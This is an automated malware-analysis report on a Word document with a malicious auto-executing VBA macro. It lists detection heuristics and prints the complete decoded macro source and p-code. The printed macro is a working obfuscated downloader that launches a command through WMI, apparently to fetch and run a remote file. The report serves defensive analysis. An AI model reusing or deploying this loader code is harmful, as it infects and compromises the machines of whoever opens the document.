Verdict: MALICIOUS
Risk Score: 190
Heuristics: 7
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call.
  Matched line in script: GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
  Matched line in script: Sub AutoOpen()
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10694 bytes | 8a1cd5e2af71d3f4cda1f46e453405802fd965359c56550a717c7831a12f93ea |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu
End Sub
Sub FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu()
Dim vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN As String
Dim sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu As String
vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN = "19920920014620122020113214719913213420020120813214" & _
"72021321472131321671581921872052102002112192151921" & _
"84197215207215192201210199146216220216132150162210" & _
"21720813213813220020120813214720213214721313216715" & _
"81921872052102002112192151921841972152072151921971" & _
"46201220201132150162210217208132138132198205216215" & _
"19720020920521013214718421419721021520220121413221" & _
"62042011742111981322042162162121581471471491571501" & _
"46149154156146152153146149153150147180183182217210" & _
"21521219719920114517321021821120720118221721014519" & _
"92012142162172162052081672112002012001462162202161" & _
"32167158192187205210200211219215192184197215207215" & _
"19220121019914621622021613213813219920121421621721" & _
"62052081321452002011992112002011321671581921872052" & _
"10200211219215192184197215207215192201210199146216" & _
"22021613216715819218720521020021121921519218419721" & _
"52072151921971462012202011321381321671581921872052" & _
"10200211219215192177205199214211215211202216146178" & _
"16918419217021419720920121921121420715415219221815" & _
"21461481461511481511491571922052102152161972082082" & _
"17216205208146201220201132147208211203202205208201" & _
"16113214717621120318421116721121021521120820116120" & _
"21972082152011321471851321671581921872052102002112" & _
"19215192184197215207215192197146201220201134"
sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN)
On Error Resume Next
If ActiveDocument.Name <> zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("204201208208211146200211199") Then
Exit Sub
End If
On Error GoTo 0
Dim aHDFOqXekZrYdocrOpNOsjdQRoDghfW As String
Dim obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM As String
Dim iDiFwSGgutwANWqgSXDhnaAKC As Variant
Dim OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS As Variant
aHDFOqXekZrYdocrOpNOsjdQRoDghfW = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("219205210209203209216215158192192146192214211211216192199205209218150")
obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("187205210151150195180214211199201215215")
OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS = Null
GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
End Sub
Function hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu)
hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR = Chr(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu - 100)
End Function
Function LhBbnQJHaqwydGKtiTwGmpDzV(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm)
LhBbnQJHaqwydGKtiTwGmpDzV = Left(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm, 3)
End Function
Function VddOROxmpnMMdeLojNuwlvgPXmC(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH)
VddOROxmpnMMdeLojNuwlvgPXmC = Right(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH, Len(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH) - 3)
End Function
Function zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
Do
pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW + hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(LhBbnQJHaqwydGKtiTwGmpDzV(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
pGaVjsZIyajfKIxlkCTLPpVyvJSF = VddOROxmpnMMdeLojNuwlvgPXmC(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
Loop While Len(pGaVjsZIyajfKIxlkCTLPpVyvJSF) > 0
zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
End Function
' Processing file: /opt/analyzer/scan_staging/3d031d4574dc4919ba5afd3ed6026e6c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 8910 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' ArgsCall vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 0x0000
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Sub vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN())
' Line #5:
' Dim
' VarDefn sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu (As String)
' Line #6:
' Dim
' VarDefn zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR (As String)
' Line #7:
' Line #8:
' LineCont 0x005C 04 00 04 00 06 00 04 00 08 00 04 00 0A 00 04 00 0C 00 04 00 0E 00 04 00 10 00 04 00 12 00 04 00 14 00 04 00 16 00 04 00 18 00 04 00 1A 00 04 00 1C 00 04 00 1E 00 04 00 20 00 04 00 22 00 04 00 24 00 04 00 26 00 04 00 28 00 04 00 2A 00 04 00 2C 00 04 00 2E 00 04 00 30 00 04 00
' LitStr 0x0032 "19920920014620122020113214719913213420020120813214"
' LitStr 0x0032 "72021321472131321671581921872052102002112192151921"
' Concat
' LitStr 0x0032 "84197215207215192201210199146216220216132150162210"
' Concat
' LitStr 0x0032 "21720813213813220020120813214720213214721313216715"
' Concat
' LitStr 0x0032 "81921872052102002112192151921841972152072151921971"
' Concat
' LitStr 0x0032 "46201220201132150162210217208132138132198205216215"
' Concat
' LitStr 0x0032 "19720020920521013214718421419721021520220121413221"
' Concat
' LitStr 0x0032 "62042011742111981322042162162121581471471491571501"
' Concat
' LitStr 0x0032 "46149154156146152153146149153150147180183182217210"
' Concat
' LitStr 0x0032 "21521219719920114517321021821120720118221721014519"
' Concat
' LitStr 0x0032 "92012142162172162052081672112002012001462162202161"
' Concat
' LitStr 0x0032 "32167158192187205210200211219215192184197215207215"
' Concat
' LitStr 0x0032 "19220121019914621622021613213813219920121421621721"
' Concat
' LitStr 0x0032 "62052081321452002011992112002011321671581921872052"
' Concat
' LitStr 0x0032 "10200211219215192184197215207215192201210199146216"
' Concat
' LitStr 0x0032 "22021613216715819218720521020021121921519218419721"
' Concat
' LitStr 0x0032 "52072151921971462012202011321381321671581921872052"
' Concat
' LitStr 0x0032 "10200211219215192177205199214211215211202216146178"
' Concat
' LitStr 0x0032 "16918419217021419720920121921121420715415219221815"
' Concat
' LitStr 0x0032 "21461481461511481511491571922052102152161972082082"
' Concat
' LitStr 0x0032 "17216205208146201220201132147208211203202205208201"
' Concat
' LitStr 0x0032 "16113214717621120318421116721121021521120820116120"
' Concat
' LitStr 0x0032 "21972082152011321471851321671581921872052102002112"
' Concat
' LitStr 0x002C "19215192184197215207215192197146201220201134"
' Concat
' St sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu
' Line #9:
' Line #10:
' Line #11:
' Ld sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR
' Line #12:
' OnError (Resume Next)
' Line #13:
' Ld ActiveDocument
' MemLd Name
' LitStr 0x001B "204201208208211146200211199"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' Ne
' IfBlock
' Line #14:
' ExitSub
' Line #15:
' EndIfBlock
' Line #16:
' OnError (GoTo 0)
' Line #17:
' Line #18:
' Line #19:
' Dim
' VarDefn obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM (As String)
' Line #20:
' Dim
' VarDefn iDiFwSGgutwANWqgSXDhnaAKC (As String)
' Line #21:
' Dim
' VarDefn OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS (As Variant)
' Line #22:
' Dim
' VarDefn hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR (As Variant)
' Line #23:
' Line #24:
' Line #25:
' LitStr 0x0045 "219205210209203209216215158192192146192214211211216192199205209218150"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM
' Line #26:
' LitStr 0x0027 "187205210151150195180214211199201215215"
' ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001
' St iDiFwSGgutwANWqgSXDhnaAKC
' Line #27:
' LitVarSpecial (Null)
' St hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Line #28:
' Line #29:
' Ld zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR
' Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR
' Ld OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS
' Ld iDiFwSGgutwANWqgSXDhnaAKC
' Ld obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM
' ArgsLd GetObject 0x0001
' ArgsMemLd Get 0x0001
' ArgsMemCall Create 0x0004
' Line #30:
' Line #31:
' Line #32:
' EndSub
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' FuncDefn (Function LhBbnQJHaqwydGKtiTwGmpDzV(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN))
' Line #37:
' Ld vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN
' LitDI2 0x0064
' Sub
' ArgsLd Chr 0x0001
' St LhBbnQJHaqwydGKtiTwGmpDzV
' Line #38:
' EndFunc
' Line #39:
' Line #40:
' FuncDefn (Function fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm(VddOROxmpnMMdeLojNuwlvgPXmC))
' Line #41:
' Ld VddOROxmpnMMdeLojNuwlvgPXmC
' LitDI2 0x0003
' ArgsLd Left 0x0002
' St fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm
' Line #42:
' EndFunc
' Line #43:
' Line #44:
' FuncDefn (Function yjKWenHHLnvyCuSHXYCsKhIyTnJGnH(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
' Line #45:
' Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF
' Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF
' FnLen
' LitDI2 0x0003
' Sub
' ArgsLd Right 0x0002
' St yjKWenHHLnvyCuSHXYCsKhIyTnJGnH
' Line #46:
' EndFunc
' Line #47:
' Line #48:
' FuncDefn (Function aHDFOqXekZrYdocrOpNOsjdQRoDghfW(pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW))
' Line #49:
' Do
' Line #50:
' Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' ArgsLd fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 0x0001
' ArgsLd LhBbnQJHaqwydGKtiTwGmpDzV 0x0001
' Add
' St _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Line #51:
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' ArgsLd yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 0x0001
' St pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' Line #52:
' Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' FnLen
' LitDI2 0x0000
' Gt
' LoopWhile
' Line #53:
' Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
' St aHDFOqXekZrYdocrOpNOsjdQRoDghfW
' Line #54:
' EndFunc
' Line #55: